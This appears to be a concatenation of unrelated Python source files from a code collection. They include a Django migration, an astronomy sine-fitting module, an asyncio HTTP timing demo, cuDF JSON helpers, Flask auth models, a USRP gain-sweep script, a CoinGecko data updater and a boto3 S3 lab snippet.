                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('best_of', models.PositiveSmallIntegerField()),
                ('extended_mode', models.BooleanField()),
                ('public', models.BooleanField()),
            ],
        ),
        migrations.CreateModel(
            name='Player',
            fields=[
            ],
            options={
                'proxy': True,
                'indexes': [],
                'constraints': [],
            },
            bases=('auth.user',),
        ),
        migrations.CreateModel(
            name='PlayerMatch',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('player_num', models.IntegerField()),
                ('match', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Match')),
                ('player', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='core.Player')),
            ],
            options={
                'ordering': ('player_num',),
                'abstract': False,
                'unique_together': {('player_num', 'match'), ('player', 'match')},
            },
        ),
        migrations.CreateModel(
            name='PlayerGame',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('player_num', models.IntegerField()),
                ('move', models.CharField(choices=[('rock', 'rock'), ('paper', 'paper'), ('scissors', 'scissors'), ('lizard', 'lizard'), ('spock', 'spock')], max_length=20)),
                ('game', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Game')),
                ('player', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='core.Player')),
            ],
            options={
                'ordering': ('player_num',),
                'abstract': False,
                'unique_together': {('player_num', 'game'), ('player', 'game')},
            },
        ),
        migrations.AddField(
            model_name='match',
            name='config',
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='core.MatchConfig'),
        ),
        migrations.AddField(
            model_name='match',
            name='players',
            field=models.ManyToManyField(related_name='matches', through='core.PlayerMatch', to='core.Player'),
        ),
        migrations.AddField(
            model_name='match',
            name='rematch',
            field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='parent', to='core.Match'),
        ),
        migrations.AddField(
            model_name='match',
            name='winner',
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='match_wins', to='core.Player'),
        ),
        migrations.AddField(
            model_name='game',
            name='match',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='games', to='core.Match'),
        ),
        migrations.AddField(
            model_name='game',
            name='players',
            field=models.ManyToManyField(through='core.PlayerGame', to='core.Player'),
        ),
        migrations.AddField(
            model_name='game',
            name='winner',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='game_wins', to='core.Player'),
        ),
        migrations.AlterUniqueTogether(
            name='game',
            unique_together={('game_num', 'match')},
        ),
    ]
| 1.710938 | 2 |
varana/varana/fit.py | pbrus/variability-analyser | 2 | 12770795 | <reponame>pbrus/variability-analyser<filename>varana/varana/fit.py<gh_stars>1-10
"""
Fit a sum of sines to the light curve.
"""
from math import sqrt, pow, atan2
from typing import Callable, Tuple, List
import numpy as np
from numpy import ndarray
from scipy.optimize import curve_fit
from varana.freq_comb import linear_combination
def approximate_sines_sum(frequencies: List[float]) -> Callable:
    """
    Build a linearized sum-of-sines model for the given frequencies.

    Each component A*sin(2*pi*f*x + fi) + y0 is expressed in linear form
    A1*sin(2*pi*f*x) + A2*cos(2*pi*f*x) + y0, where A = sqrt(A1^2 + A2^2)
    and arctg(fi) = A2/A1.

    Parameters
    ----------
    frequencies : List[float]
        A list with frequencies.

    Returns
    -------
    function
        Parameterized sum of sines expecting three parameters per frequency:
        A1, A2, y0.
    """

    def _sines_sum(x, *sines_parameters):
        """Evaluate the linearized sum of sines at x."""
        total = 0
        for idx, freq in enumerate(frequencies):
            a1, a2, y0 = sines_parameters[3 * idx:3 * idx + 3]
            total += (
                a1 * np.sin(2 * np.pi * freq * x)
                + a2 * np.cos(2 * np.pi * freq * x)
                + y0
            )
        return total

    return _sines_sum
def amplitude(coefficients: ndarray) -> float:
    """
    Compute the sine amplitude A = sqrt(A1^2 + A2^2) from linear coefficients.
    See approximate_sines_sum function.

    Parameters
    ----------
    coefficients : ndarray
        A (2,)-shape array holding the two coefficients.

    Returns
    -------
    float
        The amplitude value.
    """
    return sqrt(sum(c * c for c in coefficients))
def phase(coefficients: ndarray) -> float:
    """
    Compute the sine phase from linear coefficients.
    See approximate_sines_sum function.

    Parameters
    ----------
    coefficients : ndarray
        A (2,)-shape array holding the two coefficients.

    Returns
    -------
    float
        The phase angle mapped into the [0, 2*pi) interval.
    """
    angle = atan2(coefficients[1], coefficients[0])
    if angle < 0:
        angle += 2 * np.pi
    return angle
def convert_linear_parameters(parameters: ndarray) -> ndarray:
    """
    Replace each (A1, A2) coefficient pair with (amplitude, phase), in place.
    See approximate_sines_sum function.

    Parameters
    ----------
    parameters : ndarray
        Flat array of sum-of-sines parameters, three per sine.

    Returns
    -------
    ndarray
        The same array with coefficients rewritten as amplitudes and phases.
    """
    # reshape(-1, 3) yields views, so writing to ``row`` updates ``parameters``;
    # the right-hand side is evaluated before either slot is overwritten.
    for row in parameters.reshape(-1, 3):
        row[0], row[1] = amplitude(row[:2]), phase(row[:2])
    return parameters
def add_frequencies(parameters: ndarray, frequencies: List[float]) -> ndarray:
    """
    Insert a frequency after the amplitude of each parameter triple.

    Parameters
    ----------
    parameters : ndarray
        Flat array with three parameters (amplitude, phase, y0) per sine.
    frequencies : List[float]
        Frequencies delivered by input, one per sine.

    Returns
    -------
    ndarray
        A (-1, 4)-shape array: amplitude, frequency, phase, y0 per row.
    """
    result = np.empty(0).reshape(0, 4)
    for triple, freq in zip(parameters.reshape(-1, 3), frequencies):
        result = np.append(result, np.insert(triple, 1, freq))
    return result.reshape(-1, 4)
def fit_approximate_curve(lightcurve: ndarray, frequencies: List[float]) -> ndarray:
    """
    Perform a linear least-squares fit of a sum of sines to the light curve.
    Each sine has a fixed, given frequency.

    Parameters
    ----------
    lightcurve : ndarray
        Three columns: time, magnitude, magnitude error.
    frequencies : List[float]
        All frequencies delivered by input.

    Returns
    -------
    ndarray
        Best-fit parameters of the approximate_sines_sum model.
    """
    model = approximate_sines_sum(frequencies)
    time, mag, err = lightcurve[:, 0], lightcurve[:, 1], lightcurve[:, 2]
    initial_guess = np.zeros(3 * len(frequencies))
    best_fit, _ = curve_fit(model, time, mag, sigma=err, p0=initial_guess)
    return best_fit
def approximate_parameters(lightcurve: ndarray, frequencies: List[float]) -> ndarray:
    """
    Fit the approximate sum of sines and convert its raw parameters.

    Parameters
    ----------
    lightcurve : ndarray
        Three columns: time, magnitude, magnitude error.
    frequencies : List[float]
        All frequencies delivered by input.

    Returns
    -------
    ndarray
        One row per sine: amplitude, frequency, phase, y intercept.
    """
    raw = fit_approximate_curve(lightcurve, frequencies)
    return add_frequencies(convert_linear_parameters(raw), frequencies)
def final_sines_sum(linear_comb: ndarray) -> Callable:
    """
    Build a sum-of-sines model whose frequencies are linear combinations
    of a set of basic frequencies.

    Parameters
    ----------
    linear_comb : ndarray
        An (n, m)-shape array of integer coefficients:
        - n: number of all frequencies (base and combinations)
        - m: number of basic frequencies

    Returns
    -------
    function
        Parameterized sum of sines.  The parameter vector holds the m basic
        frequencies, then an (amplitude, phase) pair per sine, then y0 last.
    """

    def _sines_sum(x, *param):
        """Evaluate the model at x."""
        n_comb, n_base = linear_comb.shape
        total = 0
        for row in range(n_comb):
            freq = np.dot(param[:n_base], linear_comb[row])
            amp = param[n_base + 2 * row]
            ph = param[n_base + 2 * row + 1]
            total += amp * np.sin(2 * np.pi * freq * x + ph)
        return total + param[-1]

    return _sines_sum
def split_frequencies(
    frequencies: List[float], minimum: int, maximum: int, max_harmonic: int, epsilon: float
) -> Tuple[List[float], List[float]]:
    """
    Partition frequencies into independent ones and linear combinations
    C1*f1 + C2*f2 + ... of the independent set.

    Parameters
    ----------
    frequencies : List[float]
        A list with frequencies.
    minimum : int
        Lower bound of each combination coefficient.
    maximum : int
        Upper bound of each combination coefficient.
    max_harmonic : int
        Maximum allowed harmonic (greater than the coefficient upper bound).
    epsilon : float
        Tolerance used when matching a frequency to a linear combination.

    Returns
    -------
    tuple
        Two lists: basic frequencies, then their combinations.
    """
    ordered = sorted(frequencies)
    # The smallest frequency is always taken as basic.
    basic = ordered[:1]
    for freq in ordered[1:]:
        if not np.any(linear_combination(basic, freq, minimum, maximum, max_harmonic, epsilon)):
            basic.append(freq)
    combined = [freq for freq in ordered if freq not in basic]
    return basic, combined
def frequencies_combination(
    frequencies: List[float], minimum: int, maximum: int, max_harmonic: int, epsilon: float
) -> Tuple[List[float], ndarray]:
    """
    Select from all frequencies only those which are independent and generate an array with coefficients of linear
    combinations of basic frequencies, i.e. C1, C2, C3, ...: (C1*f1 + C2*f2 + ...)

    Parameters
    ----------
    frequencies : List[float]
        A list with frequencies.
    minimum : int
        A lower bound of each coefficient.
    maximum : int
        An upper bound of each coefficient.
    max_harmonic : int
        A maximum value for a harmonic. It should be greater than the upper bound of each coefficient.
    epsilon : float
        If a single frequency is compared to the linear combination of another frequencies, the epsilon means tolerance
        in this comparison.

    Returns
    -------
    tuple
        A tuple made of a list and an ndarray. The first one contains basic frequencies, the second one is an array with
        coefficients of linear combinations of basic frequencies.
    """
    base_frequencies, combined_frequencies = split_frequencies(frequencies, minimum, maximum, max_harmonic, epsilon)
    # Identity rows: each basic frequency is its own trivial combination.
    array = np.eye(len(base_frequencies), dtype=int)

    for combined_frequency in combined_frequencies:
        # One coefficient row per combined frequency, appended below the
        # identity block (np.append with axis=0 stacks rows).
        linear_comb = linear_combination(base_frequencies, combined_frequency, minimum, maximum, max_harmonic, epsilon)
        linear_comb = linear_comb.reshape(-1, len(base_frequencies))
        array = np.append(array, linear_comb, axis=0)

    return base_frequencies, array
def initial_sines_sum_parameters(approximate_param: ndarray, basic_frequencies: List[float]) -> ndarray:
    """
    Assemble the starting parameter vector for the final sum-of-sines fit.

    Parameters
    ----------
    approximate_param : ndarray
        One row per sine: amplitude, frequency, phase, y0.
    basic_frequencies : List[float]
        A list with basic frequencies.

    Returns
    -------
    ndarray
        Basic frequencies, then (amplitude, phase) per sine, then the
        summed y0 values last.
    """
    amp_phase = np.append(approximate_param[:, :1], approximate_param[:, 2:3], axis=1)
    head = np.append(np.array(basic_frequencies), amp_phase.flatten())
    return np.append(head, approximate_param[:, -1].sum())
def fit_final_curve(
    lightcurve: ndarray,
    frequencies: List[float],
    minimum: int = -5,
    maximum: int = 5,
    max_harmonic: int = 10,
    epsilon: float = 1e-5,
) -> ndarray:
    """
    Non-linear least-squares fit of the final sum of sines to the light curve.

    Only the basic frequencies are free parameters; the remaining sines use
    frequencies that are harmonics or linear combinations
    fn = C1*f1 + C2*f2 + ... of the basic set.

    Parameters
    ----------
    lightcurve : ndarray
        Three columns: time, magnitude, magnitude error.
    frequencies : List[float]
        All frequencies delivered by input.
    minimum : int
        Lower bound of each combination coefficient.
    maximum : int
        Upper bound of each combination coefficient.
    max_harmonic : int
        Maximum allowed harmonic (greater than the coefficient upper bound).
    epsilon : float
        Tolerance used when matching a frequency to a linear combination.

    Returns
    -------
    ndarray
        Parameters describing the fitted function (see final_parameters).
    """
    base_freqs, comb_matrix = frequencies_combination(
        frequencies, minimum, maximum, max_harmonic, epsilon
    )
    # Seed the non-linear fit with the linear approximation over the full
    # (reconstructed) frequency set.
    approx = approximate_parameters(lightcurve, np.dot(base_freqs, comb_matrix.T).tolist())
    model = final_sines_sum(comb_matrix)
    time, mag, err = lightcurve[:, 0], lightcurve[:, 1], lightcurve[:, 2]
    start = initial_sines_sum_parameters(approx, base_freqs)
    fitted, _ = curve_fit(model, time, mag, sigma=err, p0=start)
    return final_parameters(fitted, comb_matrix)
def final_parameters(parameters: ndarray, frequencies_comb: ndarray) -> ndarray:
    """
    Reformat the fitted parameter vector into y0 followed by
    (amplitude, frequency, phase) triples.

    Parameters
    ----------
    parameters : ndarray
        Basic frequencies, (amplitude, phase) pairs and a trailing y0.
    frequencies_comb : ndarray
        An (n, m)-shape coefficient array over the m basic frequencies.

    Returns
    -------
    ndarray
        y0, amplitude1, frequency1, phase1, amplitude2, frequency2, ...
    """
    n_base = frequencies_comb.shape[1]
    # Reconstruct every frequency from the fitted basic frequencies.
    freqs = np.dot(parameters[:n_base], frequencies_comb.T)
    n_sines = int((len(parameters) - n_base - 1) / 2)

    result = np.array(parameters[-1])
    for sine in range(n_sines):
        amp = parameters[2 * sine + n_base]
        ph = normalize_phase(parameters[2 * sine + 1 + n_base])
        result = np.append(result, [amp, freqs[sine], ph])
    return result
def normalize_phase(phase_param: float) -> float:
    """
    Map a phase angle into the [0, 2*pi) interval.

    Parameters
    ----------
    phase_param : float
        A value of phase in radians.

    Returns
    -------
    float
        The equivalent phase within [0, 2*pi).
    """
    two_pi = 2 * np.pi
    return phase_param - two_pi * (phase_param // two_pi)
def print_parameters(parameters: ndarray) -> None:
    """
    Pretty-print the fitted parameters: the y intercept on the first line,
    then one "amplitude frequency phase" line per sine.

    Parameters
    ----------
    parameters : ndarray
        y0, amplitude1, frequency1, phase1, amplitude2, frequency2, ...
    """
    print("{0:16.10f}".format(parameters[0]))
    row_fmt = "{0:16.10f} {1:16.10f} {2:16.10f}"
    for triple in parameters[1:].reshape(-1, 3):
        print(row_fmt.format(*triple))
def sines_sum(parameters: ndarray) -> Callable:
    """
    Construct a sum-of-sines function for the given parameters.

    Parameters
    ----------
    parameters : ndarray
        y0, amplitude1, frequency1, phase1, amplitude2, frequency2, phase2, ...

    Returns
    -------
    function
        f(x) = amplitude1*sin(2*pi*frequency1*x + phase1) +
               amplitude2*sin(2*pi*frequency2*x + phase2) + ... + y0
    """
    y0 = parameters[0]
    # pre-extract the (amplitude, frequency, phase) triples once
    triples = [
        (parameters[3 * i + 1], parameters[3 * i + 2], parameters[3 * i + 3])
        for i in range(len(parameters) // 3)
    ]

    def _sines_sum(x):
        # accumulate term by term (same order as the original), add y0 last
        total = 0
        for amplitude, frequency, phase in triples:
            total += amplitude * np.sin(2 * np.pi * frequency * x + phase)
        return total + y0

    return _sines_sum
def substract_model(data: ndarray, model: Callable) -> ndarray:
    """
    Subtract a model curve from the second column of the data, in place.

    Parameters
    ----------
    data : ndarray
        The data composed of two columns at least (time, magnitude, ...).
    model : function
        A function which describes the model; evaluated on column 1.

    Returns
    -------
    data : ndarray
        The same array with column2 = column2 - model(column1).
    """
    magnitudes = data[:, 1]
    # 'magnitudes' is a view, so the in-place subtraction updates *data*
    magnitudes -= model(data[:, 0])
    return data
def save_residuals(lightcurve: ndarray, parameters: ndarray, filename: str) -> None:
    """
    Save the residuals of a light curve to a text file.

    The fitted sum-of-sines model defined by *parameters* is removed from the
    magnitude column before writing.

    Parameters
    ----------
    lightcurve : ndarray
        An ndarray with (n, 3)-shape storing: time, magnitude, mag's error.
    parameters : ndarray
        An ndarray which stores parameters for each sine.
    filename : str
        A name of the file where the data will be saved to.
    """
    residuals = substract_model(lightcurve, sines_sum(parameters))
    np.savetxt(filename, residuals, fmt="%18.7f %15.7f %15.7f")
| 2.90625 | 3 |
caption_vae/version.py | jiahuei/test-caption-actions | 3 | 12770796 | <reponame>jiahuei/test-caption-actions
# -*- coding: utf-8 -*-
"""
Created on 31 Dec 2020 12:18:55
@author: jiahuei
"""
__version__ = "0.4.0"
| 0.523438 | 1 |
examples/async.py | cmheisel/presentation-python-threading | 0 | 12770797 | <gh_stars>0
"""
Thanks to http://skipperkongen.dk/2016/09/09/easy-parallel-http-requests-with-python-and-asyncio/ for the pattern.
"""
import asyncio
from timeit import default_timer as timer
import requests
# Demo endpoints: each one artificially delays the response by N seconds
# (5 down to 1) before redirecting, so sequential fetching would take ~15 s
# while the concurrent version below finishes in roughly the longest delay.
URLS = [
    "http://slowyourload.net/5/https://chrisheisel.com",
    "http://slowyourload.net/4/https://chrisheisel.com",
    "http://slowyourload.net/3/https://chrisheisel.com",
    "http://slowyourload.net/2/https://chrisheisel.com",
    "http://slowyourload.net/1/https://chrisheisel.com",
]
def get_url(url):
    """Fetch *url* with a blocking GET, logging start and completion."""
    print("GET {}".format(url))
    # response body is intentionally discarded; only the timing matters here
    requests.get(url)
    print("\tDONE GET {}".format(url))
async def main(loop):
    """Fetch all URLS concurrently and report the total wall-clock time.

    The blocking ``requests.get`` calls are pushed onto the loop's default
    ThreadPoolExecutor (``run_in_executor(None, ...)``), so they overlap
    instead of running one after another.
    """
    print("Async ====================")
    start = timer()

    futures = [loop.run_in_executor(None, get_url, url) for url in URLS]

    # The original iterated over the gathered results only to discard them;
    # awaiting the gather directly is equivalent and clearer.
    await asyncio.gather(*futures)

    end = timer()
    duration = (end - start)
    print("DONE in {} seconds".format(duration))
if __name__ == "__main__":
    # NOTE(review): asyncio.get_event_loop() is deprecated for this use on
    # modern Python; asyncio.run(main(...)) would be the current idiom — confirm
    # the targeted Python version before changing.
    event_loop = asyncio.get_event_loop()
    try:
        event_loop.run_until_complete(main(event_loop))
    finally:
        # always release the loop's resources, even if main() raised
        event_loop.close()
| 3.265625 | 3 |
python/cudf/io/json.py | tgravescs/cudf | 1 | 12770798 | <filename>python/cudf/io/json.py
# Copyright (c) 2019, NVIDIA CORPORATION.
import cudf
from cudf.utils import ioutils
import pandas as pd
import warnings
@ioutils.doc_read_json()
def read_json(path_or_buf, *args, **kwargs):
    """{docstring}"""
    # CPU fallback: parse with pandas on the host, then copy the frame to GPU
    warnings.warn("Using CPU via Pandas to read JSON dataset, this may "
                  "be GPU accelerated in the future")
    pd_value = pd.read_json(path_or_buf, *args, **kwargs)
    return cudf.from_pandas(pd_value)
@ioutils.doc_to_json()
def to_json(cudf_val, path_or_buf=None, *args, **kwargs):
    """{docstring}"""
    # CPU fallback: copy the cuDF object to a host pandas object and serialize
    warnings.warn("Using CPU via Pandas to write JSON dataset, this may "
                  "be GPU accelerated in the future")
    pd_value = cudf_val.to_pandas()
    # NOTE(review): pd.io.json.to_json is a pandas-internal entry point, not
    # public API — consider pd_value.to_json(path_or_buf, ...); confirm the
    # supported pandas versions before changing.
    pd.io.json.to_json(
        path_or_buf,
        pd_value,
        *args,
        **kwargs
    )
| 2.5625 | 3 |
setup.py | CUrW-SL/distributed_hechms | 1 | 12770799 | from setuptools import setup,find_packages
# Package metadata and dependencies for the distributed HEC-HMS service.
setup(
    name='hechmsd',
    version='1.0.0',
    packages=find_packages(),
    url='http://www.curwsl.org/',
    license='',
    author='hasitha',
    author_email='<EMAIL>',
    description='HecHms Distributed version',
    # ship non-Python data files declared for the package as well
    include_package_data=True,
    # NOTE(review): pip requirement names are case-insensitive, so 'FLASK'
    # resolves to Flask; no versions are pinned here — confirm that floating
    # versions are acceptable for deployment.
    install_requires=['FLASK', 'Flask-Uploads', 'Flask-JSON', 'pandas','numpy','shapely', 'joblib', 'netCDF4', 'matplotlib', 'imageio', 'scipy', 'geopandas'],
    zip_safe=False
)
| 1.023438 | 1 |
app/auth/models.py | farooq-teqniqly/envino | 0 | 12770800 | from datetime import datetime
from flask_login import UserMixin
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
class User(UserMixin, db.Model):
    """Application user; UserMixin supplies the flask-login session hooks."""

    # NOTE(review): string primary key of length 32 — presumably the provider's
    # user id or a hex UUID; confirm against how ids are generated.
    id = db.Column(db.String(32), primary_key=True)
    username = db.Column(db.String(128), index=True, unique=True, nullable=False)
    email = db.Column(db.String(128), index=True, unique=True, nullable=False)
    # stored as an integer flag (0/1) rather than a boolean column
    is_authorized = db.Column(db.Integer, default=0, nullable=False)
    created = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)
class OAuth(db.Model):
    """OAuth credentials issued for a :class:`User` by an external provider."""

    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.String(32), db.ForeignKey(User.id), nullable=False)
    # full token payload (e.g. serialized token response)
    token = db.Column(db.String(1024), nullable=False)
    access_token = db.Column(db.String(256), nullable=False)
    # NOTE(review): named like a duration but stored as an absolute DateTime —
    # presumably the expiry instant; confirm against the code that sets it.
    expires_in = db.Column(db.DateTime, nullable=False)
    provider = db.Column(db.String(10), default="google", nullable=False)
    # integer flag (0/1) marking tokens that are no longer valid
    expired = db.Column(db.Integer, default=0, nullable=False)
    created = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)
    user = db.relationship(User)
| 2.6875 | 3 |
scripts/swipe_parameter.py | zjc263/GPU_SDR | 9 | 12770801 | import sys,os,random
import numpy as np
try:
import pyUSRP as u
except ImportError:
try:
sys.path.append('..')
import pyUSRP as u
except ImportError:
print "Cannot find the pyUSRP package"
import argparse
if __name__ == "__main__":

    parser = argparse.ArgumentParser(description='Test the basic VNA functionality.')

    parser.add_argument('--folder', '-fn', help='Name of the folder in which the data will be stored. Move to this folder before everything', type=str, default = "data")
    parser.add_argument('--gain', '-g', help='list of TX gains, default is 0', nargs='+')
    parser.add_argument('--frontend', '-rf', help='front-end character: A or B', type=str, default="A")
    parser.add_argument('--guard_tones','-gt', nargs='+', help='Add guard Tones in MHz (offset from freq) as a list i.e. -T 1 2 3')
    parser.add_argument('--decimation', '-d', help='Decimation factor required', type=float, default=100)
    parser.add_argument('--time', '-t', help='Duration of the noise acquisition in seconds', type=float, default=10)
    parser.add_argument('--VNA', '-vna', help='Initial VNA, resonators will be initialized with the parameter of this file (has to be fitted)', type=str, required = True)
    parser.add_argument('--seed_init', '-si', help='Initialize every fit with the seed VNA instead of using last VNA', action="store_true")
    parser.add_argument('--peak_width', '-w', help='Frequency span for fitting.', type=float, default=80e3)
    parser.add_argument('--mode', '-m', help='Noise acquisition kernels. DIRECT uses direct demodulation PFB use the polyphase filter bank technique.', type=str, default= "DIRECT")
    parser.add_argument('--trigger', '-tr', help='String describing the trigger to use. Default is no trigger. Use the name of the trigger classes defined in the trigger module with no parentesis', type=str)

    args = parser.parse_args()

    # create the working folder if needed and move into it
    try:
        os.mkdir(args.folder)
    except OSError:
        pass

    os.chdir(args.folder)

    if args.gain is None:
        gains = [0,]
    else:
        gains = [int(float(a)) for a in args.gain]

    # guard tones are given in MHz on the command line; convert to Hz
    if args.guard_tones is None:
        guard_tones = []
    else:
        guard_tones = np.asarray([int(float(a)*1e6) for a in args.guard_tones])

    if args.frontend == 'A':
        ant = "A_RX2"
    elif args.frontend == 'B':
        ant = "B_RX2"
    else:
        err_msg = "Frontend %s unknown" % args.frontend
        u.print_warning(err_msg)
        ant = None

    # BUGFIX: the original referenced the undefined name 'trigger' (instead of
    # args.trigger) and used 'return' at module level, which is a SyntaxError.
    # Resolve the trigger class from the CLI name and exit() on failure, as
    # done elsewhere in this script.
    trigger = None
    if args.trigger is not None:
        try:
            # NOTE: eval() on a CLI-provided string; acceptable for a local
            # measurement script, but only trigger class names are expected.
            trigger = eval('u.' + args.trigger + '()')
        except (SyntaxError, AttributeError):
            u.print_error("Cannot find the trigger \'%s\'. Is it implemented in the USRP_triggers module?" % args.trigger)
            exit()

    #replicate the VNA measure (WARNING: DOES NOT SUPPORT ITERATIONS)
    u.print_debug("Replicating seed VNA measure to ensure phase coherency...")
    VNA_seed_info = u.get_rx_info(args.VNA, ant=ant)
    seed_rf, seed_tones = u.get_tones(args.VNA)
    seed_start_f = VNA_seed_info['freq'][0]
    seed_end_f = VNA_seed_info['chirp_f'][0]
    seed_measure_t = VNA_seed_info['chirp_t'][0]
    seed_points = VNA_seed_info['swipe_s'][0]
    seed_gain = VNA_seed_info['gain']
    seed_rate = VNA_seed_info['rate']
    # tone count drives the multitone power compensation below
    seed_ntones = len(seed_tones) + len(guard_tones)
    u.print_debug("Adjusting power for %d tone readout..."%seed_ntones)

    if not u.Connect():
        u.print_error("Cannot find the GPU server!")
        exit()

    #measure line delay
    filename = u.measure_line_delay(seed_rate, seed_rf, str(args.frontend), USRP_num=0, tx_gain=0, rx_gain=0, output_filename=None, compensate = True, duration = 0.1)
    delay = u.analyze_line_delay(filename, True)
    u.write_delay_to_file(filename, delay)
    u.load_delay_from_file(filename)

    # seed VNA sweep, replicated with the seed gain for phase coherency
    vna_seed_filename = u.Single_VNA(
        start_f = seed_start_f,
        last_f = seed_end_f,
        measure_t = seed_measure_t,
        n_points = seed_points,
        tx_gain = seed_gain,
        Rate=seed_rate,
        decimation=True,
        RF=seed_rf,
        Front_end=str(args.frontend),
        Device=None,
        output_filename=None,
        Multitone_compensation=seed_ntones,
        Iterations=1,
        verbose=False
    )

    u.VNA_analysis(vna_seed_filename)
    u.initialize_from_VNA(args.VNA, vna_seed_filename)
    u.vna_fit(vna_seed_filename, p0=None, fit_range = args.peak_width, verbose = False)
    u.plot_VNA(vna_seed_filename, backend = "plotly", plot_decim = None)
    u.plot_resonators(vna_seed_filename, reso_freq = None, backend = 'plotly')

    #start swiping the gain parameter.
    # Add here other for loops on different params and possibly create/change folders
    #ack = raw_input("Press any key to continue (plotting of the first VNA should be in the browser)")
    for i in range(len(gains)):
        # VNA sweep at the current gain, same span/points as the seed sweep
        vna_filename = u.Single_VNA(
            start_f = seed_start_f,
            last_f = seed_end_f,
            measure_t = seed_measure_t,
            n_points = seed_points,
            tx_gain = gains[i],
            Rate=seed_rate,
            decimation=True,
            RF=seed_rf,
            Front_end=args.frontend,
            Device=None,
            output_filename=None,
            Multitone_compensation=seed_ntones,
            Iterations=1,
            verbose=False
        )
        u.VNA_analysis(vna_filename)

        #initialize resonators from last VNA scan or from seed
        if args.seed_init or (i == 0):
            u.initialize_from_VNA(vna_seed_filename, vna_filename)
        else:
            u.initialize_from_VNA(last_vna_filename, vna_filename)

        # WARNING: If folder is changed this line has to change accordingly!
        last_vna_filename = vna_filename

        #fit resonators
        u.vna_fit(vna_filename, p0=None, fit_range = args.peak_width, verbose = False)
        #u.plot_VNA(vna_filename, backend = "plotly", plot_decim = None)
        #u.plot_resonators(vna_filename, reso_freq = None, backend = 'plotly')

        #gather tones and acquire noise
        rf_freq, tones = u.get_tones(vna_filename)
        tones = np.asarray(tones)
        tones = np.concatenate((tones,guard_tones))

        noise_filename = u.Get_noise(
            tones,
            measure_t = args.time,
            rate = seed_rate,
            decimation = args.decimation,
            amplitudes = None,
            RF = seed_rf,
            output_filename = None,
            Front_end = args.frontend,
            Device = None,
            delay = None,
            pf_average = 4,
            tx_gain = gains[i],
            mode = args.mode,
            trigger = trigger
        )

        #copy the resonator group
        u.copy_resonator_group(vna_filename, noise_filename)

        u.diagnostic_VNA_noise(noise_filename, noise_points = None, VNA_file = None, ant = ant, backend = 'matplotlib')
update_data.py | PatShot/simpleCryptoViz | 0 | 12770802 | <filename>update_data.py
#!/usr/bin/env python3
import requests
import os
import pandas as pd
from datetime import datetime, timedelta
#Constants
API_BASE = 'https://api.coingecko.com/api/v3/'
ASSET_PLAT = '/asset_platforms'
COIN_LIST = '/coins/list'
def make_data_dir():
    """Create ./data under the current directory.

    Returns True when the directory was newly created, False when it
    already existed.
    """
    data_dir = os.path.join(os.getcwd(), 'data')
    try:
        os.mkdir(data_dir)
    except FileExistsError:
        return False
    return True
def update_data_folder():
    """Download the CoinGecko coin list and asset platforms into ./data.

    Saves both responses as CSV files and appends a timestamp line to
    data/metadata_f.txt recording when the update happened.

    Raises:
        NameError: when either HTTP request fails (kept as NameError for
            backward compatibility with existing callers).
    """
    try:
        res_coin = requests.get(API_BASE + COIN_LIST)
        res_plat = requests.get(API_BASE + ASSET_PLAT)
    except Exception as exc:
        # narrow from the previous bare 'except:' so KeyboardInterrupt and
        # SystemExit are no longer swallowed; chain the cause for debugging
        raise NameError("Something Unexpected in connection") from exc

    coin_df = pd.DataFrame(res_coin.json())
    plat_df = pd.DataFrame(res_plat.json())

    coin_df.to_csv(os.path.join('data', 'coin_list.csv'))
    plat_df.to_csv(os.path.join('data', 'asset_platforms.csv'))

    with open(os.path.join('data', 'metadata_f.txt'), 'a') as metafile:
        date = datetime.now().strftime("%Y_%m_%d, %H:%M:%S")
        # terminate the entry with a newline so successive timestamps do not
        # run together on one line (the original omitted the separator)
        metafile.write(date + "\n")
def check_metafile():
    """Return the most recent update timestamp from data/metadata_f.txt.

    The last non-empty line of the file is printed and returned, stripped
    of surrounding whitespace.

    Raises:
        FileNotFoundError: if the metadata file does not exist.
        ValueError: if the metadata file contains no timestamp lines.
    """
    meta_path = os.path.join('data', 'metadata_f.txt')
    try:
        with open(meta_path, 'r') as file:
            lines = [line.strip() for line in file if line.strip()]
    except FileNotFoundError:
        # BUGFIX: the original executed `raise "..."`, which raises a
        # TypeError in Python 3; raise a proper exception instead.
        raise FileNotFoundError("metadata_f.txt is not present in the data folder.")
    if not lines:
        raise ValueError("metadata_f.txt contains no update timestamps.")
    print(lines[-1])
    return lines[-1]
def auto_update_data(Interval=3):
    """
    Auto Updates Data at a Given Interval of Days.

    :param Interval: interval of updates in days.
    :return: 0 when the data is recent enough and no update was performed,
        otherwise None after triggering an update.
    """
    latest_entry = check_metafile()
    # BUGFIX: the original added a timedelta to the raw string returned by
    # check_metafile (a TypeError); parse the timestamp first. Older metadata
    # files may have timestamps appended without separators, so take the last
    # fixed-width (20-char) stamp on the line.
    stamp = latest_entry.strip()[-20:]
    last_update = datetime.strptime(stamp, "%Y_%m_%d, %H:%M:%S")
    if datetime.today() > last_update + timedelta(days=Interval):
        update_data_folder()
    else:
        return 0
if __name__ == "__main__":
    # First run (./data missing): bootstrap by downloading everything.
    if make_data_dir():
        update_data_folder()
    else:
        # ./data already exists: Interval=0 forces a freshness check now.
        auto_update_data(Interval=0)
labs/lab2-b.py | sw33tr0ll/aws-training | 2 | 12770803 | <gh_stars>1-10
#!/usr/bin/env python3
import boto3
s3_client = boto3.client('s3')
# retrieve list of buckets
raw_response = s3_client.list_buckets()
# for each bucket in your list....
for bucket in raw_response['Buckets']:
bucketName = bucket['Name']
# grab (raw) information about the objects in that bucket
raw_response = s3_client.list_objects_v2(Bucket=bucketName)
